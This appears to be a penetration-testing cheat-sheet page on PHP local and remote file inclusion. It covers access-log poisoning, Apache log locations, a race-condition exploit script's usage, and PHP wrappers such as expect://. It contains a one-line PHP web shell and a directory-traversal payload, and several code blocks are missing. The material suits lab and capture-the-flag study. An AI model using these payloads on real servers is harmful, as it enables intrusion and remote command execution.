File Inclusion
In a lot of applications, developers need to include files to load classes or to share some templates between multiple web pages.
File include vulnerabilities come from a lack of filtering when a user-controlled parameter is used as part of a file name in a call to an including function (require
, require_once
, include
or include_once
in PHP for example). If the call to one of these methods is vulnerable, an attacker will be able to manipulate the function to load his own code. File include vulnerabilities can also be used as a directory traversal to read arbitrary files. However, if the arbitrary code contains an opening PHP tag, the file will be interpreted as PHP code.
This including function can allow the loading of local resources or remote resource (a website, for example). If vulnerable, it will lead to:
Local File Include: LFI. A local file is read and interpreted.
Remote File Include: RFI. A remote file is retrieved and interpreted.
By default, PHP disables loading of remote files, thanks to the configuration option: allow_url_include
.
One liner Payload :<?php system($_GET['param']); ?>
LFI
Payloads
Reference: HTB-Poison: https://medium.com/swlh/hack-the-box-poison-writeup-w-o-metasploit-a6acfdf52ac5
Access-Log Poisoning
Access Log Locations
RHEL / Red Hat / CentOS / Fedora Linux Apache access file location – /var/log/httpd/access_log
Debian / Ubuntu Linux Apache access log file location – /var/log/apache2/access.log
FreeBSD Apache access log file location – /var/log/httpd-access.log
Exploitation
Requests to the web browser are stored in the access.log page. This includes User-Agent fields which can be controlled by the attacker.
If the access.log file evaluates the code present within these entries, we can inject a payload into any of the request headers that are reflected in the access.log file.
Inject the correct syntax to avoid corrupting the access.log file, which will render the page useless.
Vulnerable index.php File
On this web application the vulnerability exists on the index.php file. By using: ../../../../var/log/apache2/access.log as a payload we were able to see the following:
As shown, we were able to load the PHPInfo file, meaning that our code was executed.
File Upload Race Condition
Edit the payload -> webshell
Edit the LFIREQ parameter to current vulnerable parameter
Edit tmp_name '>' into > [Use a proxy to troubleshoot]
Usage: python lfi.py [IP] [Port] [Threads : 100]
RFI
ftp://
http://
expect://
The PHP expect wrapper allows you to run system commands. The syntax of the exploit is:
RFI To Code Exec
Last updated